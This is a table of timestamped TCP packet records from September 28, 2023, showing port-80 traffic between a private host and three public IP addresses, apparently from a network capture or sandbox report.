Sep 28, 2023 06:01:53.721749067 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.721755981 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.721797943 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.721806049 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.721853971 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.721865892 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.721892118 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.721905947 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.721945047 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.721987963 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.722022057 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.722032070 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.722040892 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.722067118 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.722074986 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.722136974 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.722177029 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.722235918 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.722249985 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.722270966 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.722275972 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.722294092 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.722295046 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.722312927 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.722316980 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.722326040 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.722333908 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.722353935 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.722354889 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.722372055 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.722376108 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.722390890 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.722394943 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.722412109 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.722412109 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.722438097 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.722443104 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.722444057 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.722459078 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.722477913 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.722479105 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.722492933 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.722517967 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.722532034 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.722569942 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.722569942 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.722608089 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.882119894 CEST	49794	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:53.882539034 CEST	49798	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:54.069607973 CEST	80	49798	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:54.069883108 CEST	49798	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:54.069967985 CEST	49798	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:54.076102018 CEST	80	49794	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:54.076210976 CEST	49794	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:54.257236958 CEST	80	49798	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:54.261301994 CEST	80	49798	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:54.261415958 CEST	49798	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:54.429233074 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.542280912 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.542542934 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.542817116 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.655585051 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.664297104 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.664311886 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.664330959 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.664345980 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.664347887 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.664366961 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.664366961 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.664375067 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.664386034 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.664392948 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.664405107 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.664412022 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.664422989 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.664423943 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.664438963 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.664446115 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.664463997 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.664465904 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.664484024 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.664504051 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.777355909 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.777475119 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.777520895 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.777568102 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.777611971 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.777635098 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.777635098 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.777635098 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.777657032 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.777662992 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.777662992 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.777702093 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.777708054 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.777745008 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.777765036 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.777791977 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.777801991 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.777820110 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.777842045 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.777862072 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.777862072 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.777883053 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.777890921 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.777910948 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.777913094 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.777937889 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.777941942 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.777956009 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.777957916 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.777976036 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.777981043 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.778001070 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.778001070 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.778024912 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.778027058 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.778042078 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.778048038 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.778059006 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.778084993 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.891175032 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.891217947 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.891252041 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.891285896 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.891319036 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.891351938 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.891375065 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.891375065 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.891375065 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.891375065 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.891385078 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.891396999 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.891396999 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.891427040 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.891432047 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.891467094 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.891477108 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.891500950 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.891510010 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.891535044 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.891545057 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.891570091 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.891580105 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.891603947 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.891613007 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.891638994 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.891648054 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.891671896 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.891683102 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.891705036 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.891715050 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.891750097 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.891763926 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.891808033 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.891829967 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.891843081 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.891869068 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.891940117 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.891983986 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.892018080 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.892041922 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.892060041 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.892091990 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.892127037 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.892163992 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.892182112 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.892203093 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.892272949 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.892299891 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.892316103 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.892353058 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.892369986 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.892373085 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.892385006 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.892405033 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.892410040 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.892410994 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.892445087 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.892477036 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.892481089 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.892489910 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.892518997 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.892524004 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.892538071 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.892573118 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.892582893 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.892591953 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.892596006 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.892616034 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.892630100 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.892731905 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.892798901 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.892811060 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.892877102 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.892880917 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.892894983 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.892913103 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:54.892946005 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:54.892956972 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.004497051 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.004568100 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.004615068 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.004622936 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.004659891 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.004662991 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.004671097 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.004698992 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.004714966 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.004722118 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.004741907 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.004743099 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.004760981 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.004767895 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.004786968 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.004789114 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.004811049 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.004811049 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.004832029 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.004836082 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.004851103 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.004864931 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.004869938 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.004888058 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.004889011 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.004894972 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.004905939 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.004913092 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.004925013 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.004942894 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.004950047 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.004961967 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.004977942 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.004980087 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.004998922 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005008936 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005017996 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005033970 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005037069 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005057096 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005058050 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005064964 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005084038 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005096912 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005110979 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005125046 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005142927 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005157948 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005161047 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005176067 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005179882 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005182028 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005198002 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005207062 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005232096 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005237103 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005254030 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005287886 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005307913 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005325079 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005326986 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005343914 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005361080 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005379915 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005399942 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005414009 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005433083 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005434036 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005450964 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005453110 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005470991 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005470991 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005487919 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005506992 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005554914 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005572081 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005590916 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005609035 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005619049 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005628109 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005637884 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005656004 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005664110 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005677938 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005682945 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005700111 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005702019 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005719900 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005721092 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005738974 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005738974 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005759001 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005759954 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005789042 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005795956 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005825043 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005851030 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005866051 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005925894 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.005951881 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.005965948 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.006006956 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.006021976 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.006025076 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.006052971 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.006055117 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.006076097 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.006108046 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.006108999 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.006128073 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.006129980 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.006146908 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.006148100 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.006165028 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.006167889 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.006184101 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.006202936 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.006203890 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.006230116 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.006266117 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.006277084 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.006284952 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.006294966 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.006313086 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.006330013 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.006330967 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.006367922 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.006386042 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.006386995 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.006405115 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.006422997 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.006463051 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.006500006 CEST	80	49799	192.185.131.188	192.168.2.3
